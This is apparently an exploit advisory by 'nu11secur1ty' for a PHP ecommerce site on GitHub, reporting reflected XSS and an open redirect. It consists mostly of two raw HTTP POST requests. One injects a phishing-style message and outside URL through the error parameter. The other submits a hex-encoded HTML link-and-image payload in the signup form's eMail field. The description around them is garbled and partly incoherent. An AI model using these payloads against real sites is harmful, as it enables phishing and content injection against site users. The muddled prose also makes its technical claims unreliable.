Ecommerce 1.0 Cross Site scripting/Open Redirect

## Title: Ecommerse-1.0 XSS-Reflected Hijack-credentials – JavaScript Injection
## Author: nu11secur1ty

## Date: 11.23.2022

## Vendor: https://github.com/winston-dsouza

## Software: https://github.com/winston-dsouza/ecommerce-website

## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website

## Description:

Copy the value of the eMail Request Parameter into the value

An HTML tag attribute that is enclosed in double quotation marks.

This system is very simple to hack into and can be used by an attacker to trick users.

Very dangerous link, from any location. Then the game is over.

These customers.

By using botnet computers, an attacker could also create a network.

This vulnerability.

## STATUS: HIGH Vulnerability

[+] Exploit00:

“`POST

POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.com

HTTP/1.1

Host: pwnedhost.com

Accept-Encoding: gzip, deflate

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107

Safari/537.36

Connectivity: Close

Cache-Control: max-age=0

Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f

Origin: http://pwnedhost.com

Upgrade-Insecure-Requests: 1

Referer: http://pwnedhost.com/ecommerce/index.php

Content-Type: application/x-www-form-urlencoded

Sec-CH-UA: “.Not/A)Brand”;v=”99″, “Google Chrome”;v=”107″, “Chromium”;v=”107″

Sec-CHUA-Platform for Windows

Sec-CH-UA-Mobile: ?0

Content-Length: 0

“`

## Description01:

JavaScript is possible to be embedded into an application response, making it vulnerable

app – signup_script.php, no sanitizing submit function).

An attacker could crash MySQL servers by sending POST large chunks.

This system will accept requests from the MySQL server.

CRITICAL ## STATUS: HIGH Vulnerability

## Real attack:

[+] Exploit01:

“`POST

POST /ecommerce/signup_script.php HTTP/1.1

Host: pwnedhost.com

Accept-Encoding: gzip, deflate

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107

Safari/537.36

Connectivity: Close

Cache-Control: max-age=0

Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f

Origin: http://pwnedhost.com

Upgrade-Insecure-Requests: 1

Referer: http://pwnedhost.com/ecommerce/index.php

Content-Type: application/x-www-form-urlencoded

Sec-CH-UA: “.Not/A)Brand”;v=”99″, “Google Chrome”;v=”107″, “Chromium”;v=”107″

Sec-CHUA-Platform for Windows

Sec-CH-UA-Mobile: ?0

Content-Length: 1070

eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ

“`

## Reproduce:

[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)

## Evidence and Exploit

[href](https://streamable.com/3r4t36)

## Real Exploit:

[href](https://streamable.com/n3b5ev)

## Real Exploit – code insert:

[href](https://streamable.com/64dmo2)

## Time spent

`1:45`